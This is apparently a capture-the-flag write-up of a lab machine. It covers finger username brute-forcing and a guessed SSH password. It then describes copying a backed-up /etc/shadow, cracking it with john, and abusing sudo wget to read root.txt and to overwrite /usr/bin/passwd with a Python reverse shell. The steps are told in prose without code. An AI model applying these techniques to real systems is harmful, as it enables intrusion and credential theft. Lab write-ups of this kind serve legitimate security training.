ENUMERATION

Nmap Scan

FINGER ENUMERATION

When I got nothing, I thought of bruteforcing some usernames on finger using pentest-monkeys’ amazing script — — finger-user-enum-1.0.

SSH ENUMERATION

This was a guesswork, trying box name as password worked.

USER — SUNNY ENUMERATION

enumerating user sudo rights I found we can run script, as root.

Watching what happens on running /root/troll, I see it prints user id, nothing much. So I went for more enumeration and found a folder named backup containing backup for /etc/shadow.

Copy both the files to your machine and crack the password using john

Now that we have got user password for sammy let’s SSH into his session

USER — SAMMY ENUMERATION

PRIVILEGE ESCALATION

Checking sudo rights of user sammy.

There are more than one ways of exploitation and escalating privileges using wget. I have discussed only two. Let’s see them one by one.

  1. using — input-file flag

Why not call an internal file named root.txt from internal link /root/

2) exploit any user binary file,

What if I say calling /usr/bin/passwd, won’t change the password, instead it is meant to give you shell. We are here using trivial way of exploitation, i.e. changing definition of what file do by modifying it’s contents. We will create a malicious payload i.e. a reverse shell python code and wget it such that we save it’s output to output file /usr/bin/passwd.

Call command passwd and see magic on netcat on your machine

ROOTED!!!!

OSCP | CEH | Cyber Security Enthusiast.